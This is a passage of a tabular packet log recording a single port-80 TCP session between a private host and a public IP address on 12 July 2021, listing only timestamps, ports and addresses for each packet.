Jul 12, 2021 10:29:45.700921059 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.700947046 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.700973034 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.701231956 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.701808929 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.701831102 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.701869965 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.703655005 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.703692913 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.703735113 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.704428911 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.704462051 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.704484940 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.704581976 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.705569029 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.705625057 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.705769062 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.707170963 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.707230091 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.707259893 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.708493948 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.708538055 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.708561897 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.708933115 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.708982944 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.709007025 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.710305929 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.710330009 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.710364103 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.711774111 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.711801052 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.711848021 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.712021112 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.712044001 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.712064981 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.712801933 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.712865114 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.712954044 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.712977886 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.713000059 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.713023901 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.713033915 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.713078976 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.713758945 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.713783026 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.713851929 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.814922094 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.837831020 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.837873936 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.837898016 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.837923050 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.837944984 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.837976933 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.837992907 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.838018894 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.838028908 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.838046074 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.838916063 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.839015007 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.839039087 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.839080095 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.839132071 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.839193106 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.839303970 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.839354992 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.839397907 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.839562893 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.839607954 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.839657068 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.839734077 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.839759111 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.839798927 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.839845896 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.839886904 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.839922905 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.840487957 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.840512991 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.840533972 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.840554953 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.840574026 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.840603113 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.840612888 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.840635061 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.840675116 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.841564894 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.841594934 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.841617107 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.841630936 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.841650963 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.841679096 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.841692924 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.841717005 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.841734886 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.842392921 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.842506886 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.842644930 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.842730999 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.842766047 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.842787027 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.842813015 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.842840910 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.842852116 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.843318939 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.843348980 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.843395948 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.843410015 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.843445063 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.843488932 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.843527079 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.843569994 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.843635082 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.844283104 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.844335079 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.844362020 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.844377995 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.844407082 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.844422102 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.844443083 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.844482899 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.844541073 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.845025063 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.845057964 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.845079899 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.845103025 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.845134020 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.845146894 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.845323086 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.845350981 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.845402956 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.845999956 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.846071959 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.846128941 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.846152067 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.846198082 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.846219063 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.846280098 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.846326113 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.846342087 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.846815109 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.846854925 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.846879959 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.846923113 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.846945047 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.846966982 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.846986055 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.847012997 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.847093105 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.847799063 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.847850084 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.847903013 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.847933054 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.847954988 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.847974062 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.847994089 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.848005056 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.848040104 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.848694086 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.848774910 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.848855019 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.848876953 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.848898888 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.848933935 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.861833096 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.861866951 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.861884117 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.861951113 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.861973047 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.862041950 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.862296104 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.862320900 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.862343073 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.863255978 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.863389015 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.863414049 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.863468885 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.863513947 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.863847971 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.864511967 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.864541054 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.864562035 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.864584923 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.864612103 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.864619970 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.864633083 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.864655018 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.864665031 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.864689112 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.864711046 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.864722967 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.865190029 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.865256071 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.865288019 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.865379095 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.865430117 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.865535975 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.865571022 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.865614891 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.865675926 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.865694046 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.865720987 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.865741968 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.865778923 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.865797043 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.865837097 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.866868019 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.866902113 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.866914034 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.866931915 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.866947889 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.867057085 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.867144108 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.867516994 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.867536068 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.867556095 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.867573023 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.867583036 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.867599010 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.867614985 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.867623091 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.867650986 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.868232012 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.868293047 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.868335962 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.868343115 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.868360043 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.868392944 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.868408918 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.868478060 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.868539095 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.869190931 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.869215965 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.869282007 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.869467974 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.869497061 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.869518995 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.869551897 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.869565010 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.869591951 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.869611979 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.869623899 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.869762897 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.870958090 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.870990992 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.871015072 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.871052027 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.871071100 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.871088982 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.871110916 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.871134996 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.871171951 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.871412992 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.871440887 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.871474981 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.871490955 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.871514082 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.871537924 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.871560097 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.871576071 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.871606112 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.872096062 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.872127056 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.872148037 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.872172117 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.872183084 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.872205973 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.872226954 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.872240067 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.872893095 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.872952938 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.873136044 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.873161077 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.873184919 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.873205900 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.873223066 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.873231888 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.873251915 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.873804092 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.873868942 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.874036074 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.874061108 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.874088049 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.874104023 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.874129057 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.874135971 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.874178886 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.875071049 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.875173092 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.875200987 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.875222921 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.875247002 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.875264883 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.875279903 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.875298023 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.875319958 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.875680923 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.875838995 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.875883102 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.875909090 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.875936985 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.875943899 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.875967979 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.875988960 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.876010895 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.876048088 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.876761913 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.876794100 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.876817942 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.876844883 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.876868963 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.876879930 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.876900911 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.876931906 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.876962900 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.877875090 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.877907038 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.877931118 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.877954960 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.877974987 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.877995014 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.878019094 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.878031015 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.878076077 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.878587008 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.878614902 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.878638983 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.878665924 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.878681898 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.878707886 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.878719091 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.878745079 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.878787041 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.879220009 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.879443884 CEST	80	49755	47.254.186.176	192.168.2.3
